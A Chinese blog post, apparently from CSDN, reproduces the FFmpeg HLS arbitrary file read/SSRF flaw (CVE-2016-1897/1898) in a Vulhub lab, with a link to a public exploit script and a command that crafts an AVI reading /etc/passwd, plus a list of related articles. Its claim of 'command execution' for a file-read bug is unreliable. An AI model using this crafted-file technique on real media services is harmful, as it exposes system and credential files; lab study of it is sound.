avi和音频合成 ffmpeg_ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE20161897/CVE20161898)

最新推荐文章于 2023-05-11 14:24:11 发布
最新推荐文章于 2023-05-11 14:24:11 发布
阅读量296 收藏 1
点赞数
文章标签: avi和音频合成 ffmpeg
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39517797/article/details/111639670
版权

    FFmpeg是一个完整的跨平台解决方案,用于记录、转换流式传输音频和视频,可用于预览生成和视频转换的视频编码软件。目前有非常多的视音频软件或是视频网站、手机APP都采用了这个库,但是这个库历史上曝出的漏洞也非常之多。

    这个漏洞有两个CVE编号,分别是CVE-2016-1897和CVE-2016-1898,它们两个的区别在于读取文件的行数,CVE-2016-1897只能读取文件的第一行,而CVE-2016-1898可以读取文件任意行,原理基本一样。

    HLS(HTTP Live Streaming)是Apple公司开发的一种基于HTTP协议的流媒体通信协议,大多数都应用在PC上和Iphone上。它的基本原理是把一个视频流分成很多个很小很小很小的ts流文件,然后通过HTTP下载,每次下载一点点。在一个开始一个新的流媒体会话时,客户端都会先下载一个m3u8(播放列表 Playlist)文件,里面包含了这次HLS会话的所有数据。

环境搭建

docker-compose up -d

f422fd173ec6a2e8d712095164a49b9e.png

漏洞复现

# 下载利用脚本https://github.com/neex/ffmpeg-avi-m3u-xbin/find/master
# 运行脚本,生成文件python3 gen_xbin_avi.py file:///etc/passwd 123.avi

19ad79278fc64c1688df2a4382f24cd2.png

上传123.avi文件

717f2f2c88ad4db4c6afbae308fd75dd.png

上传成功

91e0f6aa92917b788775d0bf9bfa2d5f.png

使用迅雷下载下来

http://192.168.233.132:8080/5f227fc394150.mp4

e66ea38647eb2c294144c99c8dcfaec4.png

使用迅雷默认播放器,命令执行成功

c172b5f2923bcf615492edb5fe1653ed.png

weixin_39517797
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Vulnhub复现漏洞 - ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)
JiangBuLiu的博客
07-05 2203
ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/ffmpeg/CVE-2016-1897/ 漏洞原理 在FFMpeg2.X 由于在解析HTTP Live Streaming流媒体m3u8文...
ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)
weixin_56537388的博客
11-29 493
影响范围。
ffmpeg ,结合 SSRF任意文件读取漏洞
weixin_41438728的博客
09-29 1216
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入
漏洞公告】FFmpeg本地文件任意读取漏洞
06-27 217
原文链接 近日,白帽在HackerOne平台上报了ffmpeg漏洞,该漏洞利用ffmpeg的HLS播放列表处理方式,可导致本地文件曝光,目前POC已经公开,安全风险高危,为了确保您的业务正常,防止数据泄露,建议您尽快排查和升级。FFmpeg是一个免费的多媒体框架,可以运行音频和视频多种格式的录影、转换、流功能,能让用户访问几乎所有视频格式,包括mkv、flv、mov,VLC Medi...
AAC.zip_aac_aac文件_aac读取_aac音频_ffmpeg
09-24
ADTS是一种灵活但非连续的传输格式,适合流式传输,而.aac则更常用于存储和文件传输。 要读取AAC文件,首先需要理解其文件结构。AAC数据由一系列的AAC帧组成,每个帧包含一个同步字、音频对象类型、采样率信息、...
Cmake编译生成的dll文件缺少libopencv-world450.dll和opencv-videoio-ffmpeg-64
最新发布
03-22
#use_cache "C:/OpenCv/sources/.cache" #match_hash_in_cmake_cache "OCV_DOWNLOAD_ADE_HASH_3rdparty_ade_v0_1_2d_zip" ...#do_copy "opencv_videoio_ffmpeg_64.dll" "cb4db51ee9a423e6168b9d08bee61efc" ...
simplest_ffmpeg_streamer-master.zip
04-22
FFmpeg 是一个强大的开源工具套件,用于处理各种多媒体文件,包括音频、视频以及流媒体。在本项目 "simplest_ffmpeg_streamer-master" 中,它被用来实现两个主要功能:将本地视频文件推送到流媒体服务器,以及接收并...
opencv_videoio_ffmpeg.dll和opencv_videoio_ffmpeg_64.dll
01-12
FFmpeg是一个跨平台的项目,包含了多个库和工具,用于处理音频和视频文件。它支持多种编码、解码格式,能够进行转码、播放、录制以及转换媒体文件。在OpenCV中,FFmpeg被用来实现高效的视频读取和写入功能。 `...
FFmpeg_漏洞挖掘之路.pdf
08-08
FFmpeg漏洞挖掘过程为切入点,深入浅出介绍了如何使用现代 Fuzz 工具对网络协议进行 Fuzz,并在对RTMP协议 Fuzz 的过程中发现了多处代码导致的严重漏洞 CVE-2017-11665。同时分享一些在 Fuzz 过程中的难点和...
FFmpeg任意文件读取漏洞分析
fly小灰灰的专栏
07-31 4956
1. 漏洞描述 漏洞简述: 漏洞利用了FFmpeg可以处理HLS播放列表的特性,而播放列表可以引用外部文件。通过在AVI文件中添加自定义的包含本地文件引用的HLS播放列表,可以触发该漏洞并在该文件播放过程中显示本地文件的内容 漏洞发现者:Neex 影响版本:FFmpeg < 3.3.2 2. FFmpeg 背景知识简介  FFmpeg是一套可以用来记录、转换数字音频、视频,并能将其转化为流的开源计算
CVE-2016-1897/8 - FFMpeg漏洞分析
weixin_33782386的博客
03-08 460
数据流 · 2016/05/09 10:03Author:数据流(LeeFly)@伏宸安全实验室0x00 前言这段时间有不少漏洞突然爆发,就像这几天的ImageMagick漏洞,横扫国内互联网。这一两天在乌云@Noxxx首先发了两个大厂商的FFmpeg漏洞,然后也被其他白帽子陆续提交漏洞。影响范围和严重性虽然没有ImageMagick大,但也有不少大厂商中招,而它们共同之处都是处理文件的通用组件...
纯小白使用ffmpeg提取avi视频为MP3
Never Give Up
08-30 496
考研政治希望晚上睡觉时也能听听,将AVI视频转为MP3,知乎上转了一圈发现推荐的软件都是付费的,或者版本很老。评论区有位老哥说这都是根据FFMPEG封装得,给了我一个灵感,直接使用FFMPEGAVI转为MP3 首先解决一个问题,安装FFMPEEG,根据知乎Windows下安装使用ffmpeg,但一个问题是文章里的下载链接都没用了,倒腾了一下我发现直接百度ffmpeg-4.2.2-win64-static下载下来放在D盘更直接一点 解压这个文件配置环境变量 打开命令提示符窗口。输入命令“f..
opencv+ffmpeg实现avi视频的播放
weixin_34252090的博客
04-01 208
配了一天,终于成功的在ubuntu上安装了ffmpeg,实现了opencv对avi文件读取。 在CvCapture* pCapture=cvCaptureFromAVI("video.avi")语句中pCapture总是返回null。这是因为没有安装编解码器。 ffmpeg的安装: 1.下载源文件(以ffmpeg1.2.1为例): http://ffmpeg.org/ffmpeg-1.2...
CVE-2019-9766-----Free MP3 CD Ripper音频转换器漏洞复现
per_se_veran_ce的博客
08-19 861
漏洞简介 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞。远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。 vision 2.6缓冲区中存在基于堆栈的溢出。所以我们可以为它创建一个Poc。文件类型已更改为.mp3并从远程攻击它 实验环境 攻击机:kali 192.168.168.165 目...
FFmpeg Heap Overflow 漏洞分析及利用
juruiyuan111的专栏
05-11 369
FFmpeg是一个著名的处理音视频的开源项目,使用者众多。2016年末paulcher发现FFmpeg三个堆溢出漏洞分别为CVE-2016-10190、CVE-2016-10191以及CVE-2016-10192。本文详细分析了CVE-2016-10190,是二进制安全入门学习堆溢出一个不错的案例。操作系统:Ubuntu 16.04 x64FFmpeg版本:3.2.1按照编译。
CVE-2016-1897/8 - FFMpeg vulnerability analysis
weixin_34221112的博客
05-13 233
2019独角兽企业重金招聘Python工程师标准>>> ...
漏洞预警】FFmpeg任意文件读取漏洞
fishmai的专栏
07-23 967
最近有白帽在HackerOne平台上报了ffmpeg漏洞,该漏洞利用ffmpeg的HLS播放列表处理方式,可导致本地文件曝光。 漏洞描述 6月24日,HackerOne平台名为neex的白帽子针对俄罗斯最大社交网站VK.com上报了该漏洞,并因此获得1000美元奖金。 ffmpeg可处理HLS播放列表,而播放列表中已知可包含外部文件的援引。neex表示他借由该特性,
漏洞学习记录第一天:ffmpeg漏洞理解
HWHXY的博客
12-19 543
好,现在进入主题,今天分享的漏洞ffmpeg产生的漏洞。 首先对ffmpeg做介绍,讲漏洞之前我先介绍一下技术背景,方便大家理解漏洞的原理。什么是FFmpeg呢?FFmpeg是能够将音频和视频转化为流的开源程序。什么是音频视频流呢?我们日常中所看到的视频,音频,封装在一个文件里面,可视化的一个文件,实际上其本质是由数据组成的,就像积木一样,可以垒起来不同的形状,不同的样子,但是实际上就是由同样
-D FFMPEG_DIR=/opt/projects/ffmpeg/install ..
06-03
在你的示例中,它指定了FFmpeg的安装路径为`/opt/projects/ffmpeg/install`。这个选项告诉CMake在编译Opencv时去这个路径查找FFmpeg库和头文件。 如果你已经安装了FFmpeg,但CMake在编译Opencv时无法找到它,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值